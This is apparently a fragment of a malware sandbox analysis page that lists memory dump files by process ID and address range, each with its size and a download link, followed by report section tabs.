memory/4048-143-0x00000000081C0000-0x000000000883A000-memory.dmp

Filesize
6.5MB

Download
memory/4048-150-0x0000000077930000-0x0000000077AD3000-memory.dmp

Filesize
1.6MB

Download
memory/4048-149-0x00007FFA14BF0000-0x00007FFA14DE5000-memory.dmp

Filesize
2.0MB

Download
memory/4048-148-0x0000000008840000-0x000000000B451000-memory.dmp

Filesize
44.1MB

Download
memory/4048-147-0x000000000BA10000-0x000000000BFB4000-memory.dmp

Filesize
5.6MB

Download
memory/4776-135-0x00007FF9F5F90000-0x00007FF9F6A51000-memory.dmp

Filesize
10.8MB

Download
memory/4776-133-0x0000022ABF240000-0x0000022ABF262000-memory.dmp

Filesize
136KB

Download
memory/4776-142-0x00007FF9F5F90000-0x00007FF9F6A51000-memory.dmp

Filesize
10.8MB

Download
memory/4776-132-0x0000000000000000-mapping.dmp

Download
memory/4784-157-0x0000000077930000-0x0000000077AD3000-memory.dmp

Filesize
1.6MB

Download
memory/4784-151-0x0000000000000000-mapping.dmp

Download
memory/4784-153-0x0000000000DB0000-0x00000000039C1000-memory.dmp

Filesize
44.1MB

Download
memory/4784-154-0x00007FFA14BF0000-0x00007FFA14DE5000-memory.dmp

Filesize
2.0MB

Download
memory/4784-155-0x0000000000DB0000-0x00000000039C1000-memory.dmp

Filesize
44.1MB

Download
memory/4784-156-0x0000000077930000-0x0000000077AD3000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads